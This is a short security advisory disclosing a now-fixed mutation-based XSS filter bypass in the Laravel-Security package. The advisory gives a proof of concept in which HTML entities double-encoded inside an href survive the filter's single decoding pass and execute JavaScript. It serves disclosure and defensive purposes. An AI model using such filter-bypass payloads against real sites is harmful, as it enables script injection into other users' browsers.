*#Product: Lavarel-Security XSS Filter Bypass*
*#Vulnerability: Mutation Based XSS Bypass *
*#Impact: Medium/High*
*#Authors: Rafay Baloch *
*#Company: RHAinfoSEC *
*#Website: http://rhainfosec.com
*#Status: Fixed*
*=========*
*Description*
*=========*
Laravel Security is a port of the security class from Codeigniter 2.1 for
Laravel 4.1. It relies upon a blacklist approach to filter out common
malicious inputs.
*=========*
*Vulnerability*
*==========*
The vulnerability lies in the fact that the XSS filter was decoding HTML
entities, therefore based upon this fact it was
possible to construct a payload that would successfully bypass the
filtering mechanisms and execute javascript.
*=============*
*Proof of concept*
*=============*
During intial test the following input was provided:
<a
href="javascript:confirm(1)">Clickhere</a>
The filter decodes the HTML entities and hence the attack was being
blocked.
After Decoding:
<a href="javascript:alert(1)">Clickhere</a>
Next, we double encoded the entities:
<a
href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Clickhere</a>
And since the filter would decode the entities once, we are left with the
following:
<a
href="javascript:confirm(1)">Clickhere</a>
Which is perfectly a valid syntax inside of href context and would execute
javascript.
*===*
*Fix*
*===*
The vulnerability has been fixed, the latest version doesn't decode HTML
entites and hence the attack is mitigated.
*==========*
*References*
*==========*
https://github.com/GrahamCampbell/Laravel-Security/issues/10#issuecomment-37816413